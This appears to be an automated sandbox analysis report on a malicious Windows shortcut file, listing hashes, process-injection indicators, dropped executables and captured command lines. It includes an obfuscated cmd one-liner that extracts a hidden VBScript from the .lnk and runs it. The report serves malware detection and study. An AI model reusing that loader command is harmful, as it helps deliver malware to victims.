53f6783d12672e26801ff27924eb29dc766323f36a082156b259c84a7792e6e1

General

Target

AltInv01.lnk
Size

19KB
MD5

2aab065d8bd9c03615dbf58c6e08b680
SHA1

552069e866b50513f720f080c1242fd5d7d80a0a
SHA256

26c0dff81ed85b585506f0043d650f7b594225e697926b1c8e25680541b6b60d
SHA512

780633ab6d15052300dff191e49e48eaf782cf62de75576c21123d05e3f158dd1c300e5f7869099741172ec8b556320bdecf489a4b4fc738924f2c57e6c9cf62

Score

8^/10

Blacklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

3 5048 WScript.exe

flow	pid	process
3	5048	WScript.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exelqPIJNPk.exeبابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe

description	pid	process	target process
PID 5048 wrote to memory of 1536	5048	WScript.exe	lqPIJNPk.exe
PID 5048 wrote to memory of 1536	5048	WScript.exe	lqPIJNPk.exe
PID 5048 wrote to memory of 1536	5048	WScript.exe	lqPIJNPk.exe
PID 1536 wrote to memory of 4596	1536	lqPIJNPk.exe	بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe
PID 1536 wrote to memory of 4596	1536	lqPIJNPk.exe	بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe
PID 1536 wrote to memory of 4596	1536	lqPIJNPk.exe	بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe
PID 4596 wrote to memory of 4696	4596	بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe	svchost.exe
PID 4596 wrote to memory of 4696	4596	بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe	svchost.exe
PID 4596 wrote to memory of 4696	4596	بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe	svchost.exe
PID 4596 wrote to memory of 4696	4596	بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe	svchost.exe

Executes dropped EXE 2 IoCs

Processes:

lqPIJNPk.exeبابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe

pid process

1536 lqPIJNPk.exe
4596 بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

lqPIJNPk.exeبابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe

pid	process
1536	lqPIJNPk.exe
1536	lqPIJNPk.exe
4596	بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe
4596	بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe

Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings cmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings	cmd.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\AltInv01.lnk
1⤵
PID:4932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /v:on /c del doGqH & if not exist oHfhW.txt (set "xsMWK=n" & set "iucqH=s") & fi!xsMWK!d!iucqH!tr "OzTAS.*" AltInv01.l!xsMWK!k > "C:\Users\Admin\AppData\Local\Temp\OBqOR.vb!iucqH!" & "C:\Users\Admin\AppData\Local\Temp\OBqOR.vb!iucqH!" & DtrqC
2⤵
- Modifies registry class
PID:4996

C:\ProgramData\بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe

Download Submit
C:\ProgramData\بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\OBqOR.vbs

Download Submit
C:\Users\Admin\AppData\Local\Temp\lqPIJNPk.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\lqPIJNPk.exe

Download Submit
memory/1536-3-0x00000000024B0000-0x00000000024E4000-memory.dmp

Filesize
208KB

Download
memory/4596-6-0x0000000002140000-0x0000000002174000-memory.dmp

Filesize
208KB

Download
memory/4596-7-0x0000000002390000-0x00000000023C1000-memory.dmp

Filesize
196KB

Download